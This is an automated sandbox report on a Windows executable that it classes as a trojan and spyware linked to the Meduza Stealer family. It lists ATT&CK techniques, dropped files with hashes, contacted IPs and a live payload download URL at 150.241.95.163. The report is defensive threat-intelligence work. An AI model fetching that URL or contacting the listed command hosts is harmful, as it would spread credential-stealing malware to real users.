Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 Timestomp	NTDS	25 System Information Discovery	Distributed Component Object Model	1 Email Collection	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9RM52QaURq.exe	18%	ReversingLabs	Win32.Adware.RedCap

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	29%	ReversingLabs	Win64.Trojan.Cerbu

Source	Detection	Scanner	Label
http://150.241.95.163/brozer.exe	0%	Avira URL Cloud	safe
http://150.241.95.163/brozer.exeP	0%	Avira URL Cloud	safe
http://150.241.95.163	0%	Avira URL Cloud	safe
https://contile-images.services.mozc	0%	Avira URL Cloud	safe
https://api.ipify.orgup	0%	Avira URL Cloud	safe
http://crl.microl	0%	Avira URL Cloud	safe
https://go.microsoft.col.man3	0%	Avira URL Cloud	safe
http://150.241.95.163/brozer.exeIError	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://150.241.95.163/brozer.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	wbfTHB1mDB.exe, 00000008.00000003.2572951397.0000018C89CBF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://150.241.95.163/brozer.exeP	9RM52QaURq.exe, 00000000.00000002.3244715340.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	wbfTHB1mDB.exe, 00000008.00000003.2572951397.0000018C89CBF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.microsoft.col.man3	wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.2415906158.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2415287116.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.microsoft.co	wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2415906158.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	wbfTHB1mDB.exe, 00000008.00000003.2573211700.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2572700015.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2566218670.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2573951993.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2566698140.0000018C8815D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.2415906158.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2415287116.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8810A000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000002.2649919587.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2602973119.0000018C8810C000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587353384.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588183442.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588732327.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586959933.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586158436.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	wbfTHB1mDB.exe, 00000008.00000003.2572951397.0000018C89CBF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.orgup	wbfTHB1mDB.exe, 00000008.00000002.2650409439.0000018C89C20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	wbfTHB1mDB.exe, 00000008.00000003.2579925548.0000018C89D3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.2415906158.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2415287116.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	wbfTHB1mDB.exe, 00000008.00000003.2586158436.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://150.241.95.163/brozer.exeIError	9RM52QaURq.exe	false	Avira URL Cloud: safe	unknown
http://crl.microl	powershell.exe, 00000003.00000002.2425118889.0000000007170000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	wbfTHB1mDB.exe, 00000008.00000003.2579925548.0000018C89D3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.2415906158.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp	false		high
http://150.241.95.163	9RM52QaURq.exe, 00000000.00000002.3244715340.0000000003119000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2415906158.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587805685.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8810A000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587353384.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588183442.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588732327.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586959933.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586158436.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org	wbfTHB1mDB.exe, 00000008.00000003.2580302671.0000018C89D10000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozc	wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587805685.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8810A000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587353384.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588183442.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588732327.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586959933.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586158436.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.microsoft.t/Regi	wbfTHB1mDB.exe, 00000008.00000003.2646197791.0000018C8A3B0000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2646219845.0000018C8A3B0000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2570343179.0000018C8A3A1000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2646539344.0000018C8A3B4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	9RM52QaURq.exe, 00000000.00000002.3244715340.0000000003119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2415906158.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
150.241.95.163	unknown	Spain	207714	TECNALIAES	false
45.130.145.152	unknown	Russian Federation	49392	ASBAXETNRU	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1556367
Start date and time:	2024-11-15 10:34:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9RM52QaURq.exe renamed because original name is a hash value
Original Sample Name:	ca53439dbc9699e109a1810227c124dadca4066758511727be95e57b8ce3bc0f.exe
Detection:	MAL
Classification:	mal93.troj.spyw.evad.winEXE@7/7@1/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 175 Number of non-executed functions: 97
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4888 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 9RM52QaURq.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
150.241.95.163	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.95.163/brozer.exe
150.241.95.163	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.95.163/brozer.exe
45.130.145.152	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
172.67.74.152	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TECNALIAES	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.95.163
	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.95.163
	eMfPZvOkbJ.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	G13VTHRtIa.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	u06cfykCat.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	4p8aK00tUr.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	aC5NsSYmN0.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	.main.elf	Get hash	malicious	Xmrig	Browse	150.241.101.236
	invoice_template.pdf.lnk	Get hash	malicious	SmokeLoader	Browse	150.241.91.218
ASBAXETNRU	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
CLOUDFLARENETUS	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	NewVoicemail - +1 392 504 7XXX00-33Rebecca.silvaTranscript.html	Get hash	malicious	Unknown	Browse	104.16.123.96
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	HZ1BUCfTne.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9RM52QaURq.exe.log

Download File

Process:	C:\Users\user\Desktop\9RM52QaURq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.357600602687667
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4q4E4Tye:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HL
MD5:	5E81AA26543B9563AD2F3DD158C2D251
SHA1:	8CDDEF245BA7B062E14CD647C625A5E56540D4D7
SHA-256:	74F0D7AE39AD589C466A7E10EDF16AC218774048E97A92F5C8862715EEEF0685
SHA-512:	F802BA6E36BDE95C51B5559B6104B8E82E6F8157CF762C7F4BBA0A2E7364809157D08670D6E841A59FD32111B876C7C460B2E05ACED78720F044759D6DBF5BD4
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.373786547542959
Encrypted:	false
SSDEEP:	48:7WSU4fv4RTmTpoUeW+gZ9tK8NPZHUxL7u1iMuge//ZuUyus:7LH3IaTmLgZ2KRHWLOugIs
MD5:	826B886FE234AC7D6273EFFA9C84C90D
SHA1:	7E19EB8BFA247E2AFE1092ECC7BEBB28D78E94E5
SHA-256:	F77562AF4CF1010055944E5151FD42213C798AE7D21B805C67F41FDDFDE0D058
SHA-512:	ECC19DC387EE894D9C002B1B2DDC74B9DB90ED55E252AD35C37F32922117CC3ED699E3FC058E3F557F47A2DDCFF0C7B880D27A36FFEF00DABD7D4BBF55E1DBCA
Malicious:	false
Reputation:	low
Preview:	@...e...........................................................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<...............i..VdqF...\|...........System.Configuration8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Download File

Process:	C:\Users\user\Desktop\9RM52QaURq.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2632704
Entropy (8bit):	3.734500250570844
Encrypted:	false
SSDEEP:	24576:MoEKQByjnqh0lhSMXlybSXuRVRoTahOpEfc:jLzjneSan
MD5:	183E24B654414D7BE786CCD8E6A108A5
SHA1:	A18E6D0F9D1E67F404985ADFA2CC6D756E8680AC
SHA-256:	69F8CEA7A5B6E5DE711E9849F4BC0244F1344966364520BC12987F1B90013754
SHA-512:	8CB2D66A7FFE9E84B9BACE8BBD859F050FBF7DC0CB9C4A262BF3467A39D3DB43272D40A071FD2867E84A4CD262BAA6E5347A46556DCAE1A1BFFA0497A147850B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Joe Sandbox View:	Filename: HZ1BUCfTne.exe, Detection: malicious, Browse Filename: HZ1BUCfTne.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T...5...5...5.......5.......5.......5...M..H5...M...5...M...5......5.......5...M...5...5..h5.......5.......5.......5..Rich.5..................PE..d....O4g.........."....).j....$................@..............................(...........`.................................................T.'.d....`(......0(.p,...........p(.P.....'.8.............................'.@............................................text....h.......j.................. ..`.rdata...p$......r$..n..............@..@.data....(....(.......'.............@....pdata..p,...0(.......'.............@..@.rsrc........`(...... (.............@..@.reloc..P....p(......"(.............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmmzq2wr.y1r.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
